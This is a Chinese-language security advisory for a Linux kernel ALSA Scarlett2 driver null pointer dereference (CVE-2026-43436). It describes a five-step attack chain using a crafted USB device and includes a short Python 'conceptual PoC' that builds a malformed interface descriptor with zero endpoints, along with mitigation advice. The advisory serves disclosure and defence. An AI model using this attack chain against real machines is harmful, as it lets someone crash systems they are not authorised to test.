CVE-2026-43436 CVSS 5.5 中危

CVE-2026-43436: Linux内核ALSA驱动空指针解引用漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43436

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核ALSA usb-audio驱动中的Scarlett2混音器特性存在一个空指针解引用漏洞。当驱动程序解析恶意的USB描述符时，由于在scarlett2_find_fc_interface()函数中未检查端点数量，直接访问了不存在的端点，导致内核崩溃。该漏洞需要本地物理访问或模拟USB设备才能触发。

技术细节

该漏洞位于Linux内核的sound/usb/scarlett2.c文件中。在处理Scarlett2系列音频接口的混音器设置时，驱动程序调用scarlett2_find_fc_interface()函数来查找特定的USB接口。该函数假设接口描述符中包含端点（endpoint），并未对bNumEndpoints进行有效性检查。如果攻击者提供一个bNumEndpoints为0或描述符损坏的USB设备，驱动程序在尝试访问endpoint指针时会发生空指针解引用（NULL dereference），进而引发内核Oops导致系统拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的物理访问权限，能够插入USB设备或通过虚拟化环境模拟USB设备。

STEP 2

步骤2

攻击者准备一个特制的USB设备（或模拟设备），该设备的USB描述符中针对Scarlett2接口设置了无效的bNumEndpoints（例如为0）。

STEP 3

步骤3

将特制设备连接到目标Linux系统，触发内核加载usb-audio驱动。

STEP 4

步骤4

驱动程序在解析Scarlett2 mixer接口时，调用scarlett2_find_fc_interface()函数并尝试访问不存在的端点指针。

STEP 5

步骤5

触发空指针解引用，导致内核崩溃或系统重启，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# Conceptual PoC: Crafting a malformed USB descriptor
# This code simulates a device descriptor structure that would trigger the vulnerability
# if used with a USB device emulator or passed to a vulnerable kernel.

def generate_malformed_descriptor():
    # USB Interface Descriptor
    # bLength, bDescriptorType, bInterfaceNumber, bAlternateSetting,
    # bNumEndpoints (Set to 0 to trigger the bug), bInterfaceClass, ...
    bLength = 9
    bDescriptorType = 0x04 # Interface
    bInterfaceNumber = 0
    bAlternateSetting = 0
    bNumEndpoints = 0  # Vulnerability: Code assumes > 0
    bInterfaceClass = 0x01 # Audio
    bInterfaceSubClass = 0x01
    bInterfaceProtocol = 0x00
    iInterface = 0
    
    descriptor = struct.pack('<BBBBBBBBB',
                             bLength, bDescriptorType, bInterfaceNumber,
                             bAlternateSetting, bNumEndpoints, bInterfaceClass,
                             bInterfaceSubClass, bInterfaceProtocol, iInterface)
    return descriptor

print("[+] Malformed USB Interface Descriptor generated.")
print("[+] Sending this descriptor to a vulnerable kernel via USB device would trigger a crash.")

影响范围

Linux Kernel < 6.1 (Specific commits)

Linux Kernel < 6.6 (Specific commits)

Linux Kernel < 6.8 (Specific commits)

防御指南

临时缓解措施

由于漏洞需要物理接入USB设备，最有效的临时缓解措施是严格控制系统物理访问权限，并禁用不必要的USB端口。对于虚拟化环境，确保虚拟机无法直接访问宿主机的USB设备或采用经过验证的USB驱动堆栈。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表